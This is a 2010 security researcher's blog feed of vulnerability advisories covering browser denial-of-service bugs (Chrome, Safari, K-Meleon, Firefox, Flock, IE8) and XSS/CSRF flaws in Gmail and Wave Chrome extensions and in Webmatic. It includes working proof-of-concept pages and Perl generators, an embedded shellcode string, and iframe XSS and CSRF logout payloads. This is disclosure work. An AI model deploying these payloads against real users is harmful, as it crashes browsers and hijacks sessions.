User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4 <br />
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4<br />
Command Line /usr/lib/chromium-browser/chromium-browser<br />
<br />
In al cases Chrome is minimized and denies the access to <br />
"window manager button" and we can´t no change beetwen applications<br />
that we have open.<br />
<br />
<br />
##################<br />
Windows 7 32 bits<br />
###################<br />
<br />
Google Chrome 5.0.375.86 (Build oficial 49890)<br />
on windows 7 ultimate fully patched.<br />
<br />
It causes a DoS in chrome and a DoS in IE8 when <br />
exploit it across Google Chrome Frame.<br />
<br />
###############<br />
Debian 2.6.26<br />
###############<br />
<br />
Google Chrome 6.0.472.25 (Build oficial 55113) devWebKit 534.3<br />
V82.2.24.11<br />
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3<br />
<br />
in all cases Debian Closes all chrome Windows.( Chrome Crash)<br />
<br />
<br />
####################<br />
Proof Of Concepts<br />
####################<br />
<br />
this PoC is for testing in win7 32 bits, chrome <br />
and chrome frame in conjuncion with ie8 that causes <br />
a DoS in ie8 <br />
<br />
#############################<br />
<meta http-equiv="X-UA-Compatible" content="chrome=1"><br />
<h1> wait 10 or 11 seconds :)</h1><br />
<script><br />
<br />
function do_buffer(payload, len) {<br />
while(payload.length < (len * 2)) payload += payload;<br />
payload = payload.substring(0, len);<br />
return payload;<br />
}<br />
function DoS()<br />
{<br />
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 38000);<br />
prompt(buffer);<br />
}<br />
setTimeout('DoS()',1000);<br />
</script><br />
################# EOF ###################<br />
<br />
This second PoC is for test in Linux or in Mac OS X<br />
<br />
#######################################<br />
<h1> wait 10 or 11 seconds :)</h1><br />
<script><br />
<br />
function do_buffer(payload, len) {<br />
while(payload.length < (len * 2)) payload += payload;<br />
payload = payload.substring(0, len);<br />
return payload;<br />
}<br />
function DoS()<br />
{<br />
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 50000);<br />
prompt(buffer);<br />
}<br />
setTimeout('DoS()',1000);<br />
</script><br />
################# EOF ###################<br />
<br />
############<br />
References<br />
############<br />
related vuln:<br />
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html<br />
<br />
Google chrome bugtrack:<br />
http://code.google.com/p/chromium/issues/detail?id=47617<br />
<br />
################### €nd ###################<br />
<br />
Thnx To Climbo for his patience and support.<br />
<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-36209861201760653232010-08-04T08:35:00.002-07:002010-08-04T08:38:08.893-07:00Safari for windows Long link DoS############################################<br />
Safari for windows Long link DoS<br />
Vendor URL:http://www.apple.com/safari/<br />
Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html<br />
Vendor notified:Yes exploit available: YES<br />
############################################<br />
<br />
Safari is prone vulnerable to Dos with a very long Link...<br />
This issue is exploitable via web links like <a href="very long URL"><br />
click here</a> or similar vectors. Safari fails to render the link <br />
and it turn Frozen resulting in a Denial of service condition.<br />
<br />
#################<br />
Versions Tested<br />
#################<br />
<br />
I have tested this issue in win xp sp3 and a windows 7 fully pached.<br />
<br />
Win XP sp3:<br />
<br />
Safari 5.0.X vulnerable<br />
Safari 4.xx vulnerable <br />
<br />
windows 7 Ultimate:<br />
<br />
Safari 5.0.X vulnerable<br />
Safari 4.xx vulnerable <br />
<br />
############<br />
References<br />
############<br />
<br />
Discovered: 29-07-2010<br />
vendor notify:31-07-2010<br />
Vendor Response:<br />
Vendor patch:<br />
<br />
####################<br />
Proof Of Concept<br />
####################<br />
<br />
#######################################################################<br />
#!/usr/bin/perl<br />
# safari & k-meleon Long "a href" Link DoS<br />
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com<br />
# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS<br />
# generate the file open it with safari wait a seconds<br />
######################################################################<br />
<br />
$archivo = $ARGV[0];<br />
if(!defined($archivo))<br />
{<br />
<br />
print "Usage: $0 <archivo.html>\n";<br />
<br />
}<br />
<br />
$cabecera = "<html>" . "\n";<br />
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";<br />
$fin = "</html>";<br />
<br />
$datos = $cabecera . $payload . $fin;<br />
<br />
open(FILE, '<' . $archivo);<br />
print FILE $datos;<br />
close(FILE);<br />
<br />
exit;<br />
<br />
################## EOF ######################<br />
<br />
##############<br />
Related Links<br />
##############<br />
<br />
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251<br />
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474<br />
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776<br />
<br />
###################### €nd #############################<br />
<br />
Thnx to Phreak for support and let me undestanding the nature of this bug<br />
thnx to jajoni for test it in windows 7 X64 bits version.<br />
<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-15752782263271041052010-08-04T08:18:00.002-07:002010-08-04T08:23:39.743-07:00K-Meleon for windows about:neterror Stack Overflow DoS############################################<br />
K-Meleon for windows about:neterror Stack Overflow DoS<br />
Vendor URL:http://kmeleon.sourceforge.net/<br />
Advisore:http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html<br />
Vendor notified:Yes exploit available: YES<br />
############################################<br />
<br />
K-Meleon is an extremely fast, customizable, lightweight web browser<br />
based on the Gecko layout engine developed by Mozilla which is also <br />
used by Firefox. K-Meleon is free, open source software released under<br />
the GNU General Public License and is designed specifically for <br />
Microsoft Windows (Win32) operating systems.<br />
<br />
K-Meleon is prone vulnerable to crashing with a very long URL...<br />
Internal web pages like about:neterror does not limit the amount of <br />
chars that a user put in 'c' 'd' params and them if we compose a <br />
malformed url the browser can be chash easy.This issue is exploitable<br />
via web links like <a href="http://www.blogger.com/very%20long%20URL">click here</a> or via <br />
window.location.replace('very long url') or similar vectors.<br />
<br />
#################<br />
Versions Tested<br />
#################<br />
<br />
I have tested this issue in win xp sp3 and a windows 7 fully pached.<br />
<br />
Win XP sp3:<br />
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes )<br />
K-Meleon 1.6.0a4 Vulnerables.(crashes)<br />
<br />
windows 7 Ultimate:<br />
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes)<br />
K-Meleon 1.6.0a4 Vulnerables.(crashes)<br />
<br />
############<br />
References<br />
############<br />
<br />
Discovered: 29-07-2010<br />
vendor notify:31-07-2010<br />
Vendor Response:<br />
Vendor patch:<br />
<br />
########################<br />
ASM code stack overflow<br />
########################<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEN6J-j0JQKVpMWiCMD0NDjlCN6b90yygIVDBBOHVTGzg0eIqxgxtKWnqI7zQ83hblLq7uf4RQJW8Gd3UyydbKm1OQjnj3B_BAelwA3pTTMNYRAzVY7DbaNsI88YRLoR9stqgo/s1600/k-meleon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEN6J-j0JQKVpMWiCMD0NDjlCN6b90yygIVDBBOHVTGzg0eIqxgxtKWnqI7zQ83hblLq7uf4RQJW8Gd3UyydbKm1OQjnj3B_BAelwA3pTTMNYRAzVY7DbaNsI88YRLoR9stqgo/s200/k-meleon.png" width="200" /></a></div>################ <br />
#Proof Of Concept <br />
################ <br />
<br />
#######################################################################<br />
#!/usr/bin/perl<br />
# k-meleon Long "a href" Link DoS<br />
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com<br />
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS<br />
# generate the file open it with k-keleon click in the link and wait a seconds<br />
######################################################################<br />
<br />
$archivo = $ARGV[0];<br />
if(!defined($archivo))<br />
{<br />
<br />
print "Usage: $0 <archivo.html>\n";<br />
<br />
}<br />
<br />
$cabecera = "<html>" . "\n";<br />
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";<br />
$fin = "</html>";<br />
<br />
$datos = $cabecera . $payload . $fin;<br />
<br />
open(FILE, '<' . $archivo);<br />
print FILE $datos;<br />
close(FILE);<br />
<br />
exit;<br />
<br />
################## EOF ######################<br />
<br />
##############<br />
Related Links<br />
##############<br />
<br />
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251<br />
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474<br />
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776<br />
<br />
###################### €nd #############################<br />
<br />
Thnx to Phreak for support and let me undestanding the nature of this bug<br />
thnx to jajoni for test it in windows 7 X64 bits version.<br />
<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-7127686386080026322010-07-13T07:48:00.001-07:002010-07-13T07:51:46.431-07:00IE8 On windows 7 32 bits unspecified DoS##########################################<br />
IE8 On windows 7 32 bits unspecified DoS<br />
Vendor URL:http://www.microsoft.com<br />
Advisore:http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html<br />
Vendor Notify:YES Vendor confirmed:YES <br />
EXPLOIT:Private<br />
###########################################<br />
<br />
A posible flaw exits in Internet explorer 8<br />
on windows 7 32-bits ,that can cause a remote <br />
denial of service from a malformed web page.<br />
<br />
This issue is tiggered when IE8 try to render<br />
Modal app prompt in conjuncion with thirds appz that <br />
uses recurses from IE8 and try to render text inputs<br />
it is a posible GDI text-rendering<br />
APIs bug or or DrawText() functions involved.<br />
<br />
When the victim visit a malformed web page, an close the 2nd<br />
appz, this appz turns unstable and needs to close , and then <br />
when IE8 try to restore<br />
the tab ,it los the focus from application and it results in<br />
a denial of service to this window , because we can't click <br />
in any bar , in any button or do some action in this window,<br />
ie8 aparently is frozen.<br />
<br />
After several test this issue only is reproducible in win7 32 bits<br />
<br />
I have a exploit or PoC for this issue , but it's<br />
private at this time :)<br />
<br />
Solution:<br />
Microsoft know that as a stability bug and they add it <br />
for consideration in a future version to address it.<br />
<br />
#################### €nd ##########################<br />
<br />
Thnx for your time !!!<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-20525046171012963252010-06-18T12:09:00.003-07:002010-06-18T12:10:21.085-07:00Google Services Notifier Chrome extension XSS/CSRF######################################<br />
Google Services Notifier Chrome extension XSS/CSRF<br />
extension:https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie<br />
advisore:http://lostmon.blogspot.com/2010/06/google-services-notifier-chrome.html<br />
Exploit available:yes vendor notify : NO<br />
#######################################<br />
<br />
So in this case "Notifier for Google Wave Chrome" <br />
has a flaw that allow attackers to make XSS style attacks.<br />
<br />
All extensions runs over his origin and no have way to altered data from extension <br />
or get sensitive data like , email account or password etc..<br />
<br />
if we look how many users have instaled this extension =><br />
https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie<br />
109 users have instaled it (WoW)<br />
<br />
############<br />
explanation<br />
############<br />
<br />
Google Services Notifier allows users to view wen they have a new wave and<br />
view a preview of it ....<br />
<br />
"Keep you update with Google services like Google Mail,Blogger,Reader,YouTube,<br />
Google Docs, Google Wave etc. More services will be added soon."<br />
<br />
If a attacker compose a new mail with html or javascript code in <br />
subject & send it to victim´s the code is executed wen Victim´s click in the<br />
extension to view a preview of mail.<br />
<br />
So for exploit we need to compose a "special" mail<br />
for example if we put directly in the mail subject a iframe like<br />
"><iframe src="javascript:alert(location.href);"></iframe><br />
in the two cases the alert is executed wen try to preview the mail <br />
with the extension :) it is executed in context location.href value is<br />
"about:blank"<br />
<br />
For example send a mail With a logout acction in google wave in body<br />
"><iframe src="https://wave.google.com/wave/logout"></iframe><br />
it closes the sesion on google wave , this is a CSRF.<br />
<br />
######################€nd#################################<br />
.<br />
Thnx for your time !!!<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-66982440680363871822010-06-18T11:32:00.002-07:002010-06-18T11:34:56.568-07:00Notifier for Google Wave Chrome extension XSS/CSRF######################################<br />
Notifier for Google Wave Chrome extension XSS/CSRF<br />
extension:https://chrome.google.com/extensions/detail/aphncaagnlabkeipnbbicmcahnamibgb<br />
advisore:http://lostmon.blogspot.com/2010/06/notifier-for-google-wave-chrome.html<br />
Exploit available:yes vendor notify : NO<br />
#######################################<br />
<br />
So in this case "Notifier for Google Wave Chrome" <br />
has a flaw that allow attackers to make XSS style attacks.<br />
<br />
All extensions runs over his origin and no have way to altered data from extension <br />
or get sensitive data like , email account or password etc..<br />
<br />
if we look how many users have instaled this extension =><br />
https://chrome.google.com/extensions/detail/aphncaagnlabkeipnbbicmcahnamibgb<br />
56,542 users have instaled it (WoW)<br />
<br />
############<br />
explanation<br />
############<br />
<br />
Notifier for Google Wave allows users to view wen they have a new wave and<br />
view a preview of it ....<br />
<br />
If a attacker compose a new wave with html or javascript code in <br />
body & send it to victim´s the code is executed wen Victim´s click in the<br />
extension to view a preview of wave.<br />
<br />
So for exploit we need to compose a "special" wave<br />
for example if we put directly in the mail body a iframe like<br />
"><iframe src="javascript:alert(location.href);"></iframe><br />
in the two cases the alert is executed wen try to preview the wave <br />
with the extension :) it is executed in context location.href value is<br />
"about:blank"<br />
<br />
For example send a wave With a logout acction in google wave in body<br />
"><iframe src="https://wave.google.com/wave/logout"></iframe><br />
it closes the sesion on google wave , this is a CSRF.<br />
<br />
######################€nd#################################<br />
.<br />
<br />
Thnx for your time !!!<br />
<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-83709628367092526922010-06-17T11:56:00.003-07:002010-06-22T04:50:38.785-07:00Gmail Checker plus Chrome extension XSS/CSRF II######################################<br />
Gmail Checker plus Chrome extension XSS/CSRF II<br />
extension: https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe<br />
advisore:http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension.html<br />
Exploit available:yes vendor notify: NO<br />
#######################################<br />
<br />
So in this case "Google Mail Checker Plus" version 1.1.7 (2010-02-10)<br />
has a flaw that allow attackers to make XSS style attacks.<br />
<br />
All extensions runs over his origin and no have way to altered data from extension <br />
or get sensitive data like , email account or password etc..<br />
<br />
if we look how many users have instaled this extension =><br />
https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe<br />
303,711 users have instaled it (WoW)<br />
<br />
############<br />
explanation<br />
############<br />
<br />
Google Mail Checker Plus allows users to view wen they have a new mail and<br />
view a preview of the mail ....<br />
<br />
If a attacker compose a new mail with html or javascript code in mail <br />
body & send it to victim´s the code is executed wen Victim´s click in the<br />
extension to view a preview of mail.<br />
<br />
So for exploit we need to compose a "special" mail <br />
for example if we put directly in the mail body a iframe like<br />
"><iframe src="javascript:alert(location.href);"></iframe><br />
the extension shows this code in plain text and the alert isn´t executed...<br />
them we need to use a Feature from gmail ( auto conver links in clicable urls)<br />
them we can compose a email body with a http link like<br />
http://"><iframe src="javascript:alert(location.href);"></iframe><br />
or compose a mail link like :<br />
lalala@"><iframe src="javascript:alert(location.href);"></iframe>.com<br />
in the two cases the alert is executed wen try to preview the email <br />
with the extension :) it is executed in context location.href value is<br />
"about:blank"<br />
<br />
<br />
Gmail is a safe place , but the extensions to manage it, can be a potential<br />
vector to attack.<br />
<br />
For example send a email With a logout acction in gmail in body<br />
http://"><iframe src="https://mail.google.com/mail/?logout&hl=es"></iframe><br />
it closes the sesion on gmail , this is a CSRF.<br />
also if the user has mark option to show notifications on desktop this issue execute the iframe too in the desktop notifications window and can cause to a denial of service of extension, for example if the victim´s try to change any option in options page from extension :P<br />
<br />
So we have dispute it in http://code.google.com/p/chromium/issues/detail?id=45401<br />
The developer has release a patch version in trunk for other issues what i disclose before<br />
see for references for previous vulns => OSVDB ID :65459 and OSVDB ID: 65460<br />
previous patch =><br />
http://github.com/AndersSahlin/MailCheckerPlus/blob/54ab118e505feae819e676c8e525e8fe5409c981/src/mailaccount.class.js<br />
and see diff => http://github.com/AndersSahlin/MailCheckerPlus/commit/54ab118e505feae819e676c8e525e8fe5409c981#diff-0<br />
<br />
<strike>I release it as 0-day and no notify to vendor because<br />
in the previous issues , he patch the vulns and don´t <br />
make any reference to it and stealing credits on discover<br />
Them i release this new vulns without notify developer :)</strike><br />
<br />
<b>UPDATED</b> :Now the extension in about secition reflects the vulnerability and credit it to me :)<br />
<br />
<br />
<br />
######################€nd#################################<br />
.<br />
<br />
Thnx for your time !!!<br />
<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-45655821083304091502010-06-03T02:56:00.004-07:002010-06-15T04:51:23.151-07:00Gmail Checker plus Chrome extension XSS######################################<br />
Gmail Checker plus Chrome extension XSS<br />
extension: https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe<br />
advisore:http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension-xss.html<br />
Exploit available:yes<br />
#######################################<br />
<br />
So in this case "Google Mail Checker Plus" version 1.1.7 (2010-02-10)<br />
has a flaw that allow attackers to make XSS style attacks.<br />
<br />
<b>All extensions runs over his origin and no have way to altered data from extension or get sensitive data like , email account or password etc..</b><br />
<br />
if we look how many users have instaled this extension =><br />
https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe<br />
303,711 users have instaled it (WoW)<br />
<br />
############<br />
explanation<br />
############<br />
<br />
Google Mail Checker Plus allows users to view wen they have a new mail and<br />
view a preview of the mail ....<br />
<br />
if a attacker compose a new mail with html or javascript code in subject form field and send it to victim´s the code is executed wen Victim´s click in the extension to view the mail and wen victim´s accept the alert and view a preview of mail the iframe is executed too.<br />
<br />
Gmail is a safe place , but the extension to manage it can be a potential<br />
vector to attack it.<br />
<br />
For example send a email With a logout acction in gmail in subject<br />
"><iframe src="https://mail.google.com/mail/?logout&hl=es"></iframe><br />
it closes the sesion on gmmail , this is a XSRF , and , in the case what you say aa<br />
it is executed in context and the location.href value is "about:blank" <br />
<br />
So we have dispute it in http://code.google.com/p/chromium/issues/detail?id=45401<br />
The developer has release a patch version in trunk => <br />
http://github.com/AndersSahlin/MailCheckerPlus/blob/54ab118e505feae819e676c8e525e8fe5409c981/src/mailaccount.class.js<br />
please donload it and copy to your extension folder to solve it.<br />
<br />
See Diff => http://github.com/AndersSahlin/MailCheckerPlus/commit/54ab118e505feae819e676c8e525e8fe5409c981#diff-0<br />
<br />
######################€nd#################################<br />
.<br />
<br />
Thnx for your time !!!<br />
<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-58853548463029396222010-04-09T14:30:00.001-07:002010-04-09T14:33:50.778-07:00Firefox 3.6.2 & 3.6.3 and flock 2.5 browsers uncaught excepcion DoS##################################<br />
Firefox 3.6.2 & 3.6.3 and flock 2.5 browsers uncaught excepcion<br />
error console DoS<br />
Vendor URL:http://www.mozilla.com<br />
vendor URL:http://www.flock.com/<br />
Advisore:http://lostmon.blogspot.com/2010/04/firefox-362-363-and-flock-25-browsers.html<br />
###################################<br />
<br />
Firefox and Flock Browsers can hang with a malformed page,<br />
and wen try to view error console firefox and flock crash <br />
due to a uncaught excepcion and this is a out of memory <br />
error.<br />
<br />
<br />
################<br />
Versions<br />
################<br />
<br />
firefox 3.6.2 and 3.6.3 vulnerable<br />
Bugzilla:<br />
https://bugzilla.mozilla.org/show_bug.cgi?id=557228<br />
<br />
Flock 2.5 vulnerable<br />
<br />
<br />
#################<br />
Proof of Concept<br />
#################<br />
<html><br />
<head><br />
<title> Bad 'throw' exception Remote DoS Flock browser 2.5 firefox 3.6.2 & 3.6.3</title><br />
</head><br />
<body onload="javascript:alert('Please Press Ctrl+Shift+J');"><br />
<script language='JavaScript'><br />
var n=unescape('%uf1a4%u7ffd');<br />
<!-- variant var n=unescape('%uc0c0%uc0c0%uc0c0'); --!><br />
<!-- Shellcode calc.exe but does not work --!><br />
var s=unescape('%uf631%u6456%u768b%u8b30%u0c76%u768b%u8b1c%u086e%u368b%u5d8b%u8b3c%u1d5c%u0178%u8beb%u184b%u7b8b%u0120%u8bef%u8f7c%u01fc%u31ef%u99c0%u1732%uc166%u01ca%u75ae%u66f7%ufa81%uf510%ue2e0%ucf75%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u6897%u652e%u6578%u6368%u6c61%u5463%u0487%u5024%ud5ffÌ');<br />
for(var i=0;i<64;i++){<br />
n=n+n;<br />
document.write('<script>throw n+s;</scr'+'ipt>');<br />
}<br />
</script><br />
</head><br />
<body><br />
<center><h1> Bad 'throw' exception Remote DoS on firefox 3.6.x and Flock browser 2.5 </h1><br />
<h3>Based on the exploit from <a href="http://hacksafe.blogspot.com/">Nishant Das Patnaik</a><br /><br />
Exploit modified by <a href="http://lostmon.blogspot.com">Lostmon</a> Lostmon@gmail.com to affects Flock and Firefox.<br />
Remember to press ctrl+shift+j and make sure that your console log is in "all" tab or in "errors" tab , in firefox and flock :)</h3><br />
<br />
</center></body><br />
</html><br />
<br />
<br />
<br />
###################€nd ##########################<br />
<br />
Thns to estrella to be my ligth<br />
-- <br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-62869881072600318892010-04-01T07:33:00.002-07:002010-04-01T07:34:43.885-07:00Flock browser marquee tag DoS############################################<br />
Flock browser marquee tag DoS <br />
advisore:http://lostmon.blogspot.com/2010/04/flock-browser-marquee-tag-dos.html<br />
############################################<br />
<br />
<br />
Flock browser contains a flaw that may allow a remote denial of service.<br />
The issue is triggered when an Victim visit a specially crafted web page<br />
with a lot of marquee html tag and it will result in loss of availability<br />
( DoS ) for Browser and posible memory corruption.<br />
<br />
This bug was first discover by '599eme Man flouf@live.fr' and this <br />
is a extended research about it, he was discovered in those browsers:<br />
Opera 10.10<br />
Firefox 3.5.7<br />
Safari 4.0.4<br />
SeaMonkey 2.0.1<br />
<br />
and i test it in :<br />
<br />
Flock Browser 1.2.6 vulnerable<br />
Flock Browser 2.5 vulnerable<br />
<br />
a sample code can be found/download here => <br />
http://www.exploit-db.com/exploits/11347<br />
<br />
########################€nd ###################<br />
<br />
Thns to estrella to be my ligth<br />
-- <br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-58817057575883416022010-03-19T07:03:00.002-07:002010-03-19T07:06:05.834-07:00Webmatic 3.0.3 Multiple cross.site scripting#################################<br />
Webmatic 3.0.3 Multiple cross.site scripting<br />
Vendor URL:http://www.valarsoft.com/<br />
Advisore: http://lostmon.blogspot.com/2010/03/webmatic-303-multiple-crosssite.html<br />
Vendor notified: YES<br />
#################################<br />
<br />
Webmatic contains a flaw that allows a remote cross site<br />
scripting attack. This flaw exists because the application<br />
does not validate multiple variables and form fields upon<br />
submission to the 'index.php' script. This could allow a <br />
user to create a specially crafted URL that would execute<br />
arbitrary code in a user's browser within the trust relationship<br />
between the browser and the server, leading to a loss of integrity.<br />
<br />
<br />
##############<br />
Versions<br />
##############<br />
<br />
valarsoft webmatic 3.0.3<br />
<br />
It´s posible that prior versions<br />
are afected<br />
<br />
<br />
################<br />
TimeLIne<br />
##############<br />
<br />
Discovered 13-01-2010<br />
Vendor notify: 14-03-2010<br />
vendor response:15-03-2010<br />
Disclosure: 19-03-2010<br />
<br />
###############<br />
Private messages<br />
################<br />
<br />
Subject field form is vulnerable<br />
<br />
a attacker can compose a PM with a malformed title<br />
and it is executed wen the victims view his inbox <br />
or open the PM.<br />
<br />
<br />
#################<br />
Forums<br />
#################<br />
<br />
Search field form ,filer variable<br />
and title form field affected.<br />
<br />
a attacker can compose a post with a malformed title<br />
and wen a victim try to browse the forum the xss is <br />
executed, also the attacker can compose a search url<br />
with xss in filter variable or put the xss in search<br />
form field to execute it.<br />
<br />
##################<br />
Chat room<br />
###################<br />
<br />
Nickname form field affected<br />
<br />
a attacker can use a malformed nick name with xss and<br />
wen he join in a channel the xss is executed in all<br />
channel´s users.<br />
<br />
######################<br />
News<br />
####################<br />
<br />
Title form filed affected<br />
<br />
a attacker can compose a new with a malformed title and <br />
wen a user browse the news sections the xss is executed<br />
also if the new has a "resume" in home page, all users <br />
wen load the page are afected by xss.<br />
<br />
pg variable affected<br />
<br />
a attacker can compose a malformed URL in news sections and <br />
insert some xss code in 'pg' variable , wen a victim clink in<br />
this url the xss is executed.<br />
<br />
#########################<br />
banners section<br />
#########################<br />
<br />
Title and label form fields<br />
<br />
A remote user can add a banner<br />
with a malformed title or/and malformed label<br />
wen the attacker visit his banner the xss is executed<br />
in his own banner management.<br />
Also if a victim visit this banner the xss is executed.<br />
<br />
############################€ND#############################<br />
<br />
Thns to estrella to be my ligth<br />
-- <br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
